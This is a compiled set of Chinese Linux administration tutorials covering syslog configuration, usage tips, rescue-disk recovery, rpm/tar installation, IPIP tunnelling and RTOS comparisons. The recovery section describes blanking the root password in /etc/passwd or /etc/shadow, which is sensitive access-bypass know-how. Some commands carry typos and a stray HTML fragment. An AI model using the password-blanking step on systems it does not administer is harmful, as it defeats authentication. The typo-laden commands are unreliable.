    tio--I/O操作的总数

    u--用户时间，以分钟计

    例如：

    842　　 173.26re　　　　4.30cp 0avio 358k

    2　　　 10.98re　　　　 4.06cp 0avio 299k find

    9　　　 24.80re　　　　 0.05cp 0avio 291k ***other

    105　　 30.44re　　　　 0.03cp 0avio 302k ping

    104　　 30.55re　　　　 0.03cp 0avio 394k sh

    162　　 0.11re　　　　　0.03cp 0avio 413k security.sh*

    154　　 0.03re　　　　　0.02cp 0avio 273k ls

    56　　　31.61re　　　　 0.02cp 0avio 823k ping6.pl*

    2　　　 3.23re　　　　　0.02cp 0avio 822k ping6.pl

    35　　　0.02re　　　　　0.01cp 0avio 257k md5sum

    97　　　0.02re　　　　　0.01cp 0avio 263k initlog

    12 0.19re 0.01cp 0avio 399k promisc_check.s

    15 0.09re 0.00cp 0avio 288k grep

    11 0.08re 0.00cp 0avio 332k awk

    用户还可以根据用户而不是命令来提供一个摘要报告。例如sa -m显示如下：

            885　　 173.28re　　　　4.31cp 0avk

    root　　879　　 173.23re　　　　4.31cp 0avk

    alias 3　　 0.05re　　　　 0.00cp 0avk

    qmailp 3　　 0.01re　　　　 0.00cp 0avk

Syslog设备
    Syslog已被许多日志函数采纳，它用在许多保护措施中--任何程序都可以通过syslog 纪录事件。Syslog可以纪录系统事件，可以写到一个文件或设备中，或给用户发送一个信息。它能纪录本地事件或通过网络纪录另一个主机上的事件。

    Syslog设备依据两个重要的文件：/etc/syslogd（守护进程）和/etc/syslog.conf配置文件，习惯上，多数syslog信息被写到/var/adm或/var/log目录下的信息文件中（messages.*）。一个典型的syslog纪录包括生成程序的名字和一个文本信息。它还包括一个设备和一个优先级范围（但不在日之中出现）。

    每个syslog消息被赋予下面的主要设备之一：

    LOG_AUTH--认证系统：login、su、getty等

    LOG_AUTHPRIV--同LOG_AUTH，但只登录到所选择的单个用户可读的文件中

    LOG_CRON--cron守护进程

    LOG_DAEMON--其他系统守护进程，如routed

    LOG_FTP--文件传输协议：ftpd、tftpd

    LOG_KERN--内核产生的消息

    LOG_LPR--系统打印机缓冲池：lpr、lpd

    LOG_MAIL--电子邮件系统

    LOG_NEWS--网络新闻系统

    LOG_SYSLOG--由syslogd（8）产生的内部消息

    LOG_USER--随机用户进程产生的消息

    LOG_UUCP--UUCP子系统

    LOG_LOCAL0~LOG_LOCAL7--为本地使用保留

    Syslog为每个事件赋予几个不同的优先级：

    LOG_EMERG--紧急情况

    LOG_ALERT--应该被立即改正的问题，如系统数据库破坏

    LOG_CRIT--重要情况，如硬盘错误

    LOG_ERR--错误

    LOG_WARNING--警告信息

    LOG_NOTICE--不是错误情况，但是可能需要处理

    LOG_INFO--情报信息

    LOG_DEBUG--包含情报的信息，通常旨在调试一个程序时使用

    syslog.conf文件指明syslogd程序纪录日志的行为，该程序在启动时查询配置文件。该文件由不同程序或消息分类的单个条目组成，每个占一行。对每类消息提供一个选择域和一个动作域。这些域由tab隔开：选择域指明消息的类型和优先级；动作域指明syslogd接收到一个与选择标准相匹配的消息时所执行的动作。每个选项是由设备和优先级组成。当指明一个优先级时，syslogd将纪录一个拥有相同或更高优先级的消息。所以如果指明"crit"，那所有标为crit、alert和emerg的消息将被纪录。每行的行动域指明当选择域选择了一个给定消息后应该把他发送到哪儿。例如，如果想把所有邮件消息纪录到一个文件中，如下：

    #Log all the mail messages in one place

    mail.* /var/log/maillog

    其他设备也有自己的日志。UUCP和news设备能产生许多外部消息。它把这些消息存到自己的日志（/var/log/spooler）中并把级别限为"err"或更高。例如：

    # Save mail and news errors of level err and higher in aspecial file.

    uucp,news.crit /var/log/spooler

    当一个紧急消息到来时，可能想让所有的用户都得到。也可能想让自己的日志接收并保存。

    #Everybody gets emergency messages， plus log them on anther machine

    *.emerg *

    *.emerg @linuxaid.com.cn

    alert消息应该写到root和tiger的个人账号中：

    #Root and Tiger get alert and higher messages

    *.alert root,tiger

    有时syslogd将产生大量的消息。例如内核（"kern"设备）可能很冗长。用户可能想把内核消息纪录到/dev/console中。下面的例子表明内核日志纪录被注释掉了：

    #Log all kernel messages to the console

    #Logging much else clutters up the screen

    #kern.* /dev/console

    用户可以在一行中指明所有的设备。下面的例子把info或更高级别的消息送到/var/log/messages，除了mail以外。级别"none"禁止一个设备：

    #Log anything（except mail）of level info or higher

    #Don't log private authentication messages!

    *.info:mail.none;autHPriv.none /var/log/messages

    在有些情况下，可以把日志送到打印机，这样网络入侵者怎么修改日志都没有用了。通常要广泛纪录日志。Syslog设备是一个攻击者的显著目标。一个为其他主机维护日志的系统对于防范服务器攻击特别脆弱，因此要特别注意。

    有个小命令logger为syslog（3）系统日志文件提供一个shell命令接口，使用户能创建日志文件中的条目。用法：logger 例如：logger This is a test！

    它将产生一个如下的syslog纪录：Aug 19 22:22:34 tiger: This is a test!

    注意不要完全相信日志，因为攻击者很容易修改它的。

    5. 程序日志

    许多程序通过维护日志来反映系统的安全状态。su命令允许用户获得另一个用户的权限，所以它的安全很重要，它的文件为sulog。同样的还有sudolog。另外，想Apache有两个日志：access_log和error_log。

    6. 其他日志工具

    chklastlog

    ftp://coast.cs.purdue.edu/pub/tools/unix/chklastlog/

    chkwtmp

    ftp://coast.cs.purdue.edu/pub/tools/unix/chkwtmp/

    dump_lastlog

    ftp://coast.cs.purdue.edu/pub/tools/unix/dump_lastlog.Z

    spar

    ftp://coast.cs.purdue.edu/pub/tools/unix/TAMU/

    Swatch

    http://www.lomar.org/komar/alek/pres/swatch/cover.html

    Zap

    ftp://caost.cs.purdue.edu/pub/tools/unix/zap.tar.gz

    日志分类方法

    http://csrc.nist.gov/nissc/1998/proceedings/paperD1.pdf

返回


Linux使用小经验十则

《一键清理系统垃圾》

Linux使用小经验十则

    1.使用虚拟控制台
    登录后按“Alt＋F2”键可以看到“login:”提示符， 这就是第二个虚拟控制台。一般新安装的Linux有四个虚拟控制台，可以用“Alt＋F1”到“Alt＋F4”来访问。虚拟控制台最有用的时候是当一个程序出错锁住输入时可以切换到其他虚拟控制台，登录进入后用kill命令杀掉这个出错的进程。
    2.拷贝与粘贴
    字符界面（不管是Slackware 还是RedHat 的）安装后，每次启动时都会自动运行一个叫gpm的程序，该程序运行后就可以用鼠标来拷贝与粘贴了。具体做法是按住鼠标左键拖动使要拷贝的文字反白，这时反白的区域已经被拷贝，再按鼠标右键拷贝的内容就会被粘贴在光标所在位置了。
    在X－Window下，拷贝操作与字符界面下一样，如果你用的是三键鼠标，按中键进行粘贴，如果是两键鼠标，则可同时按左右键粘贴（条件是必须在配置XF86时在鼠标的设置里选择 Emulate 3 Button）。
    3.快速进入某些目录
    键入cd～可进入用户的home目录。键入cd－可进入上一个进入的目录。
    4.在RedHat下显示彩色目录列表
    打开/etc/bashrc，加入如下一行：
    alias ls=″ls －－color″
    下次启动bash时就可以像在Slackware里那样显示彩色的目录列表了，其中不同颜色的含义如下：
    蓝色→目录
    绿色→可执行文件
    红色→压缩文件
    浅蓝色→链接文件
    灰色→其他文件
    5.命令文件的路径
    当你键入一些命令（如find、shutdown、mount、startx）时是否想知道这些文件究竟放在哪个目录里?用命令“whereis”可以实现，如：
    ＃whereis startx
    6.查找文件
    find 命令要加一些参数才能查到文件，如：
    ＃find /usr －name XF86Setup －print
    在/usr里查找文件XF86Setup。
    7.删除无用的core文件
    程序运行完后，有时候会产生一个名为core的文件，这个文件一般很大而且没什么用，可以删除掉以释放空间。
    8.Linux里的Norton Commander
    在提示符下键入命令mc后你就会看到一个与Norton Commander很相似的界面，实际上功能也很相似甚至更强大，比如可以直接对.tar.gz 压缩包里的文件进行操作（有点像ZipMagic）。
    9.后台运行 X－Window程序
    执行一个X－Window程序时别忘了在后面加一个＆号（如＃netscape ＆），否则，在你退出执行的程序之前再无法在那个终端窗口里输入命令了。
    10.强行退出 X－Window
    有时候在 X－Window里由于程序出错，使鼠标键盘都不起作用，这时候不用着急，因为在Linux下几乎不会像在Win 9x里那样恶性死机，你只须键入Ctrl＋Alt＋BackSpace键就可以回到字符界面下了。


Linux系统常见6种紧急情况处理方法

《一键清理系统垃圾》

Linux系统常见6种紧急情况处理方法

    Linux系统常见几种紧急情况的处理方法

    1.使用急救盘组进行维护

    急救盘组（也称为boot/root盘组），是系统管理员必不可少的工具。用它可以独立地启动和运行一个完整的Linux系统。实际 上，急救盘组中的第2张盘上就有一个完整的Linux系统，包括root文件系统；而第1张盘则存放了可启动的内核。

    使用急救盘组维护系统很简单。只需用这两张盘启动系统后，进入急救模式，这时使用的是root账户。为了能访问硬盘上的文件，需要手工安装硬盘文件系统。例如，用下面的命令可在/mnt目录中安装/dev/hda2盘上的ext2fs类型的Linux文件系统：

    # monut -t ext2/dev/hda2/mnt

    注：现在根目录是急救盘上的根目录。为了访问硬盘文件系统中的文件，必须先把它安装到某个目录下。这样，如果将硬盘上文件系统安装在/mmt目录下，则硬盘上原来的/etc/passwd文件的路径就是/mnt/etc/passwd

    2、文件系统被破坏时的处理方法

    当文件系统被破坏时，如果使用的是ext2fs类型的文件系统，就可从软盘运e2fsck命令来修正文件系统中被损坏的数据。对于其他类型的文件系统，可以使用相应的fsck命令。 当从软盘上检查文件系统时，最好不要mount安装

    注：文件系统被破坏的常见原因是超级块被损坏，超级块是文件系统的“头部”。它包含文件系统的状态、尺寸和空闲磁盘块等信息。如果损坏了一个文件系统的超级块（例如不小心直接将数据写到了文件系统的超级块分区中），那么系统可能会完全不识别该文件系统，这样也就不能安装它了，即使采用e2fsck命令也不能处理这个问题。

    不过，ext2fs类型的文件系统将超级块的内容进行了备份，并存放于驱动程序的块组（block group）边界。可以用如下的命令通知e2fsck使用超级块的备份

    # e2fsck -b 8193

    是指文件系统所在的分区，-b 8193选项用于显示使用存放在文件系统中的8193块的超级块的备份数据

    3、恢复丢失的文件

    如果不小心删除了重要的文件，那么没有办法直接恢复。但是还可以将相应的文件从急救盘复制到硬盘上。例如，如果删除了文件/bin/login，此时系统无法正常进到登录界面，可以用急救盘组启动系统，将硬盘文件系统安装到/mnt目录下，然后使用下述命令：

    #cp -a /bin/login /mnt/bin

    “-a”选项用于告诉cp在拷贝时保持文件的访问权限。 当然如果被删除的基本文件不在“急救盘组”中，也就不能用这种方法了。如果以前做过系统备份的话，那么也可以用以前的备份来恢复。

    4.函数库破坏时的处理方法

    如果不小心将系统函数库文件破坏了，或者破坏了/lib目录下符号链接，那么将导致依赖这些库的命令无法执行。最简单的解决办法是用急救盘组启动系统，在/mnt目录中安装硬盘文件系统，然后修复/mnt/lib目录下的库。

    5、无法用root账号登录系统

    由于系统管理员的疏忽，或者由于系统受到黑客的入侵，系统管理员可能无法用root帐号登录系统。

    对于第1种情况，可能是系统管理员忘记了rootFrethem/index.htm" target="_blank" style='text-decoration: underline;color: #0000FF'>密码，用急救盘组就可以解决问题。

    对于第2种情况，由于很可能是密码被黑客修改了，因此系统管理员无法进入系统，也就是说，Linux系统完全失去了控制，因此应尽快重新获得系统的控制权。在取得 root权限后，还应检查系统被破坏的情况，以防被黑客再次入侵。

    需要做的最主要的工作就是重新设置root的密码，获得Linux操作系统的控制权。首先用急救盘组启动系统，然后将硬盘的文件系统安装到/mnt目录下，编辑/mnt/etc/passwd文件，将其对应于root账户的一行加密口令域置空，如下所示：

    root：：0：0：root：/root：bin/bash注： 如果系统使用 shadow工具，就需要对文件/etc/shadow进行上述的操作，使root登录系统不需要口令。

    这样，root账户就没有口令了。当重新从硬盘启动Linux系统时，就可以用root账户登录（系统不会要求输入密码）。进入系统后，再用命令passwd设置新的口令。

    6、Linux系统不能启动

    一般来说，如果系统管理员不能正常进入系统，就需要考虑使用急救盘组进入急救模式排除系统的故障。但在没有制作急救盘组的情况下，Linux系统不能启动，该怎么办？

    在个人计算机使用 Linux系统时，通常都是Linux和MS Windows 9x或MS Windows NT并存的。由于重新安装其他的操作系统，经常会导致原有的Linux不能启动。这主要是因为，这些操作系统默认为计算机中没有其他的操作系统，因而改写了硬盘的主引导记录（MBR），冲掉了Linux的LILO系统引导程序。

    如果有急救盘组，那么很简单，用第一张启动盘启动硬盘的Linux系统，重新运行LILO命令，就可以将LILO系统引导程序写回硬盘的主引导记录。再次开机即可。

    如果没有系统启动盘，怎样恢复硬盘上的Linux呢？在这种情况下，如果知道Linux在硬盘上的确切安装分区，且有loadlin程序，就可以重新返回Linux. loadlin程序是DOS下的程序，运行它可以从DOS下直接启动Linux，快速进入Linux环境。在 Red Hat Linux 6.0光盘的 dosutil/目录下就有这个程序。除此之外，还需要一个 Linux启动内核的映像文件。在 Red Hat linux 6.0光盘的 images/目录下有这个文件——vmlinuz.

    例如，在Windows 98系统下面，进入DOS的单用户模式，然后运行下述的loadlin命令，即可重新进入Linux系统：

    loadlin vmlinuz root=/dev/hda8

    /dev/hda8是Linux的root文件系统所在的硬盘分区位置。命令执行后，就引导Linux系统。用root登录后，运行LILO命令，则重新将LILO装入MBR，回到以前多操作系统并存使用的状态。


Linux下的文字处理

《一键清理系统垃圾》

Linux下的文字处理

    当前，Linux下的文字处理软件得到很大的发展，性能直逼Windows中的相关软件。以下，我向大家介绍一个Linux下的优秀文字处理软件Applixware（它可以在 http：//www.applix.com/appware/下载）。
    Applixware在基于Intel X86、Alpha、PPC的Linux版本下均可运行。这里仅以最常见的Intel X86 Linux版本为例，典型的硬件系统需求是：P166以上CPU，32MB内存，240MB硬盘空间；软件需要glibc库，RedHat 5.x、Debian 2.x、TurboLinux 3.x及以上版本均可。
    一、安装方法如下（假设现在已取得Applixware软件的压缩包applixdemo.tgz）。
    1.以root身份登录。
    2.用tar xvzf ./applixdemo.tgz命令解包。
    3.经过解包后，会自动生成一个名为applixdemo的临时目录，进入此目录，执行安装程序./install－axdemo。其间，安装程序会询问将Applixware安装到哪个目录下，选/opt/applix或者/usr/local/applix均可。
    二、使用启动软件
    从文件管理器中点击applix图标或在xterm命令行窗口里键入/opt/applix/applix均可启动Applixware，出现applix主窗口，如^41020203a^1。从左至右，有5个大按钮，分别代表：Words字处理、Graphics/ Presentation演示图文幻灯片制作、Spreadsheet电子表格、Mail电子邮件、Data数据库连接工具。点击其中某个按钮，即可启动相应的组件。
    和MS Office一样，Applix各组件的操作界面十分相似，均分为菜单栏、工具栏、标尺栏、工作区、提示行。菜单栏里有常用的文件、编辑、视图、插入、格式、工具、帮助等菜单项。工具栏里则汇集了常用的工具按钮，如新建、打印、保存、字体、对齐方式等；工作区则是Applix文档的编辑显示区；提示行则提供一些辅助信息，如文档总页数、当前页号等等，如^41020203b^2。
    Applix的每个组件都可以嵌入其他组件产生的文档，形成一个严密的整体。且Applix的操作方法和MS Office大同小异，熟悉MS Office的用户会很容易地使用Applix套件。
    三、软件的特色
    和MS Office相比，Applix还具有另外一些特色：
    1.提供强有力的兼容文档交换手段：导入（Import）和导出（Export）
    导入是将其他格式的文档插入到当前编辑的Applix文档中，与Applix文档合为一体。导出则恰好相反，是将正在编辑的Applix文档导出保存为其他格式。Applix的导入/导出支持的格式则有数十种之多，其中最有价值的是支持MS Office文档格式。
    如：选择一个Applix文档，从菜单栏中选文件→导入（或导出），就会弹出导入（或导出）窗口，再从导入（或导出）文件类型下拉框中选中你满意的文件类型，点按导入（或导出）按钮后，就会出现一个向导，然后照提示连续按“下一步”，到最后结束，就一切OK了!
    以下Applix各组件能够支持的常用导入/导出格式：
    Words字处理：本身是aw格式，还支持MS Word 97/95/6.0/5.1，还支持Wordperfect 7.0/6.0/5.X、RTF、HTML、Frame MIF 5.X/4.0等。
    Spreadsheet电子表格：本身是as格式，还支持MS Excel 5.0/4.0/3.0的XLS，还支持Lotus 1－2－3的WKS 3.0/1.0，CSV、DIF、SYLK等。
    Graphics/ Presentation演示图文幻灯片制作：本身是ap格式，还支持PowerPoint97、Windows bmp、GIF 89/87、JPEG 90/75/50、TIFF、TGA等，也还支持XPM、XWD、PBM、PGM、PPM、SGI、CGM、HPGL、EPGL、WMF、FAX等众多格式。
    2.通过网络访问大型SQL数据库
    Appplix提供的Data数据库连接工具，为用户透明访问大型SQL数据库提供了极大的方便。用户不必精通SQL语言，即可通过网络以简单易用的图形界面访问、修改位于远方的数据库。Data支持常见的Oracle、Sybase、Informix、Ingres等SQL数据库，也支持通过ODBC交换数据的其他数据库，如MS 的SQL Server、Access等。如我们通过网络以用户名test登录，访问位于10.84.96.66主机上的Oracle数据库服务器Server1，如^41020203c^3。
    3.特殊的帮助系统
    Applix除了包含常规的帮助资料外，还包含一个Applix指南和系统演示。指南主要是介绍菜单项、工具栏按钮的用途和操作，而演示则用标签式窗口的形式分别介绍具体组件的功能、使用方法。两者以直观形象的方式帮助用户更快地掌握Applix。


Linux下软件的基本安装和卸载

《一键清理系统垃圾》

Linux下软件的基本安装和卸载

    Linux软件的安装和卸载一直是困扰许多新用户的难题。在Windows中，我们可以使用软件自带的安装卸载程序或在控制面板中的“添加/删除程序”来实现。与其相类似，在Linux下有一个功能强大的软件安装卸载工具，名为RPM。它可以用来建立、安装、查询、更新、卸载软件。该工具是在命令行下使用的。在Shell的提示符后输入rpm，就可获得该命令的帮助信息。
    Linux下软件的安装主要有三种不同的形式。第一种安装文件名为xxx.tar.gz；第二种安装文件名为xxx.i386.rpm，还有一种是xxx.src.rpm。以第一种方式发行的软件多为以源码形式发送的；第二种方式则是直接以二进制形式发送的；第三种是rpm格式发布的源码。
对于第一种[xxx.tar.gz]，安装方法如下：
    1 .首先，将安装文件拷贝至你的目录中。例如，如果你是以root身份登录上的，就将软件拷贝至/root中。
    #cp xxx.tar.gz /root
    2 .由于该文件是被压缩并打包的,应对其解压缩。命令为：
    #tar xvzf filename.tar.gz
    3. 执行该命令后，安装文件按路径，解压缩在当前目录下。用ls命令可以看到解压缩后的文件。通常在解压缩后产生的文件中，有“Install”的文件。该文件为纯文本文件，详细讲述了该软件包的安装方法。
    4.执行解压缩后产生的一个名为configure的可执行脚本程序。它是用于检查系统是否有编译时所需的库，以及库的版本是否满足编译的需要等安装所需要的系统信息。为随后的编译工作做准备。命令为： #./configure
    5.检查通过后，将生成用于编译的MakeFile文件。此时，可以开始进行编译了。编译的过程视软件的规模和计算机性能的不同，所耗费的时间也不同。命令为： #make。
    6.成功编译后，键入如下的命令开始安装：
    #make install
    7.安装完毕，应清除编译过程中产生的临时文件和配置过程中产生的文件。键入如下命令：
    #make clean
    #make distclean
    至此，软件的安装结束。

对于第二种[xxx.i386.rpm]，其安装方法要简单得多。
    同第一种方式一样，将安装文件拷贝至你的目录中。然后使用rpm来安装该文件。命令如下：
    #rpm -i filename.i386.rpm
    rpm将自动将安装文件解包，并将软件安装到缺省的目录下。并将软件的安装信息注册到rpm的数据库中。参数i的作用是使rpm进入安装模式。
    软件的卸载
    1.软件的卸载主要是使用rpm来进行的。卸载软件首先要知道软件包在系统中注册的名称。键入命令：
    #rpm -q -a
    即可查询到当前系统中安装的所有的软件包。
    2. 确定了要卸载的软件的名称，就可以开始实际卸载该软件了。键入命令：
    #rpm -e [package name]
    即可卸载软件。参数e的作用是使rpm进入卸载模式。对名为[package name]的软件包进行卸载。由于系统中各个软件包之间相互有依赖关系。如果因存在依赖关系而不能卸载，rpm将给予提示并停止卸载。你可以使用如下的命令来忽略依赖关系，直接开始卸载：
    #rpm -e [package name] -nodeps
    忽略依赖关系的卸载可能会导致系统中其它的一些软件无法使用
对于第三种[xxx.src.rpm]，安装也很简单
拷贝到目标目录，然后执行
#rpmbuild --rebuild xxx.src.rpm 编译文件
然后进入#cd /usr/src/redhat(or other)/RPMS/i386/
执行 #rpm -ivh xxxxx.rpm 安装
上面的方法是对Redhat 8.0以及Mandrake9.0来说的，如果是低于这个版本。应该用
#rpm --rebuild *.src.rpm


Linux中IP隧道的分析与建议

《一键清理系统垃圾》

Linux中IP隧道的分析与建议

----随着计算机网络的日益普及，网络的安全成为目前的热门话题。本文以Linux 2．0．34（RedHat5．2采用）为基础，对隧道技术进行分析，并侧重安全领域对在Linux环境下利用隧道技术实现虚拟专网提出建议。
----为什么需要IP隧道？没有接触过这个概念的人自然会提出这样的疑问。实际上概念最初的提出很简单，就是为了在TCP／IP网络中传输其他协议的数据包。设想一下IPX协议或X．25封装的数据包如何通过Internet网进行传输，在已经使用多年的桥接技术中是通过在源协议数据包上再套上一个IP协议头来实现的，形成的IP数据包通过Internet后卸去IP头，还原成源协议数据包，再传送给目的站点。对源协议数据来说，就如同被IP带着过了一条隧道。这种技术在业余无线网络（Amateur Packet Radio Network）中得到了广泛的应用，目前的移动式IP（mobileIP）技术已经在此基础上得到了很好的发展。

----利用IP隧道来传送的协议包也包括IP数据包，本文主要分析的IPIP封包就是如此。所谓IPIP，就是把一个IP数据包又套在一个IP包里。为什么要这么做呢？其实并非多此一举。见过一些应用就会明白，移动IP（Mobile－IP）和IP多点广播（IP－Multicast）是两个典型的例子。目前，IP隧道技术在构筑虚拟专网（VPN，Virtual Private Network）中也显示了出极大的生命力。本文也将对利用IP隧道技术构筑VPN做简单设想。

IP隧道的多种理解和实现

----Internet的研究者多年前就感到需要在网络中建立隧道，最初的理解是在网络中建立一条固定的路径，以绕过一些可能失效的网关。可以说，隧道就是一条特定的路径。这样的隧道是通过IP报头中的源路由选项来实现的。在目前看来，这种方法的缺陷十分明显。要设置源路由选项就必须知道数据包要经过的确切路径，而目前多数路由实现中都不支持源路由。

----另一种实现隧道的机制是开发一种新的IP选项，用来表明源数据包的信息，原IP头可能成为此选项的一部分。这种隧道的意义与我们所说的隧道已十分接近。但它的不足在于要对目前IP选项的实现和处理做较大的修改，此外它还缺乏灵活性。

----最常用的一种实现方法是开发一种新的IP封包（encapsulation）协议，仍然套用当前的IP头格式。通过IP封包，不须指明网络路径，封包就能透明地到达目的地。也可以通过封包空间把未直接连接的机器绑在一起，从而创建虚拟网络。这种方法易行、可靠、可扩展性强。Linux采用了这一方法，这就是目前我们所理解的隧道思想。

封包协议结构

----封包协议的实现原理十分简单，从图一中可以看到通过隧道传送的数据报在网络中是如何流动的。为了叙述简便，下文中把在隧道中传送的IP数据包称为封包。

图一封包协议实现模型

----图一中的设备＃都处于隧道的两端（中间的（＃）设备只做简单的转发），分别起打包（封装）和解包（解封）的作用。在整个数据包的传送路径中，除了隧道两端的＃设备，其他网关把数据包看成一个普通的IP包进行转发。设备＃就是一个基于封包的两个实现部件———封装部件和解封部件。封装和解封部件（设备）都应当同时属于两个子网。封装部件对接收到的数据报加上封包头，然后以解封部件地址作为目的地址转发出去；而解封部件则在收到封包后，还原为数据报，转发到目的子网。

----隧道的源端（封装部件）对进入隧道的数据包进行封装，形成封包。图二是一个完整的封包示意图。

图二封包结构

Linux封包实现

----在Linux中，隧道的实现主要涉及两个文件：new-tunnel．c和ipip．c。另外，Linux还定义了一种新的协议类型———IPIP（IPPROTO-IPIP），它类似于上面所说的封包类型。

----在Linux中IP Tunnel的实现也分为两个部件：封装部件和解封部件，分别司职发送和接收。但这两个部件是在不同的层次上以不同的方式实现的。

----封装部件是在数据链路层以虚设备的方式实现的，所有源代码见：

／usr／src／linux／drivers／net／new-tunnel．c

----为实现封装，Linux实现一个称为tunl的网络设备（类似于loopback设备），它具有其他网络设备共有的特征。对于使用此设备的上层应用来说，对这些网络设备不加区分，调用及处理方法当然也完全一样。

----new-tunnel．c中的两个主要过程是tunnel-init（）和tunnel-xmit（），其中tunnel-init（）初始化与设备tunl相关的device结构，而tunnel-xmit（）在从tunl设备发送数据时被调用，tunl设备作为实现IP隧道技术的封装部分，在此过程中完成对相应的数据报进行封装所需的全部操作，形成IPIP类型的IP包，并重新转发此数据包（ip-forward（））。

----解封部件在IP的上层实现，系统把它作为一个虚的传输层（实际上与传输层毫无关系），具体处理见文件：

／usr／src／linux／net／ipv4／ipip．c。

----我们知道，每一个IP数据包均交给ip-rcv函数处理，在进行一些必要的判断后，ip-rcv对于发送给本机的数据包将交给上层处理程序。对于IPIP包来说，其处理函数是ipip-rcv（与TCP包的处理函数tcp-rcv一样，IP层不加区分）。也就是说，当一个目的地址为本机的封包到达后，ip-rcv函数进行一些基本检查并除去IP头，然后交由ipip-rcv解封。

----ipip-rcv的作用就是去掉封包头，还原数据包，然后把还原后的数据包放入相应的接收队列（netif-rx（））中。

----上述的IPTunnel实现思路十分清晰，但由于IP Tunnel的特殊性，其实现的层次并不单纯。它的封装和解封部件不能简单地像上面所说的那样分层。tunl设备虽然应算进链路层，但其发送程序还做了很多其他的工作，如制作IPIP头及新的IP头（这些一般认为是传输层或网络层的工作）。调用ip-forward转发新包也不是一个网络设备应当做的事。可以说，tunl借网络设备之名，做的工作却很多，因此相当“高效”。而解封部件宏观上看在网络层之上，解出IPIP头，恢复原数据包是它分内的事，但在它解出数据包（即原完整的协议数据包）后，它把这个包放入相应的协议接收队列。这项任务可不是一个上层协议干的，这是网络设备中断接收程序的义务。在这点上，它好像又到了数据链路层。隧道机制就是这样的。

为实现VPN的扩展

----实际上Linux只为实现隧道机制提供了一个框架，图二中的封包协议头在Linux中被忽略了，也就是说，封包头只含封包IP头，其后紧跟原IP数据包。这样的结构用于传输公开数据没有关系，但对于一个VPN来说，安全保密是不可缺少的重要功能。我们希望通过隧道的数据可靠且不可窃取或假冒，因此加密和认证就必不可少。为实现这一构想，可设计以下封包协议头：

图三IPIP头设想图

----其中type用于建立不同目的的隧道（可能处理上有差别），OldPacketLen是进入隧道的原数据包长度，DeviceID是对数据包进行封装的设备标识，EncapID是此封包的ID号，Flags是标志位，初步定义如下：

0 保留

1 有否加密

2 有否做摘要

3 有否签名

4 保留

5 是否传送消息密钥

6 消息密钥是否加密

7 消息密钥是否需保留

8－15 保留

----IPIP Options用来传送一些必要的数据，比如消息密钥、签名等，其格式为，

  类 型
长 度
数 据

----有了上述定义，就可以扩展Linux IP Tunnel为VPN服务了。首先，改写new-tunnel．c和ipip．c两个文件，加入对IPIP头的处理。然后，要实现一种密钥的管理和传送机制。当然，对称密钥是必需的，而对IP数据包加密要使用序列密码。

----在一个VPN的隧道中，一个封包的格式应如图四所示。

图四VPN封包结构

----针对上述构想，通过对安全强度和通信速度的权衡，可以采用从不加密但速度快到高度机密但速度慢等不同的策略。当然还可以就加密强度本身作出选择，比如选择128位还是512位、1024位的加密算法。

----当然，该方案在错误检测等方面还有需要完善的地方

返回


LynxOS、QNX、Linux的分析和比较

《一键清理系统垃圾》

LynxOS、QNX、Linux的分析和比较

----本文对四种实时操作系统(RTOS)特性进行分析和比较。它们是：Lynx实时系统公司的LynxOS、QNX软件系统有限公司的QNX以及两种具有代表性的实时Linux——新墨西哥工学院的RT－Linux和堪萨斯大学的KURT－Linux。
----近年来，实时操作系统在多媒体通信、在线事务处理、生产过程控制、交通控制等各个领域得到广泛的应用，因而越来越引起人们的重视。

----基本特征概述

＊ QNX是一个分布式、嵌入式、可规模扩展的实时操作系统。它遵循POSIX.1 (程序接口)和POSIX.2 (Shell和工具)、部分遵循POSIX.1b(实时扩展)。它最早开发于1980年，到现在已相当成熟。

＊ LynxOS是一个分布式、嵌入式、可规模扩展的实时操作系统，它遵循POSIX.1a、POSIX.1b和POSIX.1c标准。它最早开发于1988年。

＊ RT－Linux是一个嵌入式硬实时操作系统，它部分支持POSIX.1b标准。

＊ KURT－Linux不是为嵌入式应用设计的，不同于硬(hard)实时／软(soft)实时应用，他们提出“严格(firm)”实时应用的概念，如一些多媒体应用和ATM网络应用，KURT是为这样一些应用设计的“严格的”实时系统。

----体系结构异同

----实时系统的实现多为微内核体系结构，这使得核心小巧而可靠，易于ROM固化，并可模块化扩展。微内核结构系统中，OS服务模块在独立的地址空间运行，所以，不同模块的内存错误便被隔离开来。但它也有弱点，进程间通信和上下文切换的开销大大增加。相对于大型集成化内核系统来说，它必须靠更多地进行系统调用来完成相同的任务。

＊ QNX是一个微内核实时操作系统，其核心仅提供4种服务：进程调度、进程间通信、底层网络通信和中断处理，其进程在独立的地址空间运行。所有其它OS服务，都实现为协作的用户进程，因此QNX核心非常小巧(QNX4.x大约为12Kb)而且运行速度极快。

＊ LynxOS目前还不是一个微内核结构的操作系统，但它计划使用所谓的“Galaxy”技术将其从大型集成化内核改造成微内核，这一技术将在LynxOS 3.0中引入。新的28Kb微内核提供以下服务：核心启动和停止、底层内存管理、出错处理、中断处理、多任务、底层同步和互斥支持。

＊ RT－Linux实现了一个小的实时核心，仅支持底层任务创建、中断服务例程的装入、底层任务通信队列、中断服务例程(ISR)和Linux进程。原来的非实时Linux核心作为一个可抢先的任务运行于这个小核心之上，所有的任务都在核心地址空间运行。它不同于微内核和大型内核，属于实时EXE (realtime executive)体系结构。其可靠性和可维护性对电信服务系统来说都不够理想。

＊ KURT－Linux核心包括两个部分：内核和实时模块。内核负责实时事件的调度，实时模块为用户进程提供特定的实时服务。它不属于微内核结构。

----调度策略分析

----任务调度策略是直接影响实时性能的因素。尽管调度算法多种多样，但大多由单调率算法(RM)和最早期限优先算法(EDF)变化而来。前者主要用于静态周期任务的调度，后者主要用于动态调度，在不同的系统状态下两种算法各有优劣。在商业产品中采用的实际策略常常是各种因素的折中。

----QNX 提供POSIX.1b标准进程调度：

＊ 32个进程优先级；

＊ 抢占式的、基于优先级的正文切换；

＊ 可选调度策略：FIFO、轮转策略、适应性策略。

----LynxOS 其调度策略为：

＊ LynxOS支持线程概念，提供256个全局用户线程优先级；

＊ 硬实时优先级调度：在每个优先级上实现了轮转调度、定量调度和FIFO调度策略；

＊ 快速正文切换和阻塞时间短；

＊ 抢占式的RTOS核心。

----RT－Linux 在操作系统之下实现了一个简单的实时核心，Linux本身作为一个可抢占的任务在核内运行，优先级最低，随时会被高优先级任务抢占。

＊ 用户可自行编写调度程序，它们可实现为可加载的核心模块；

＊ 已实现的调度程序有：基于优先级的抢占式调度和EDF调度；

＊ 基于优先级的调度使用“单调率算法”，它直接支持周期任务。

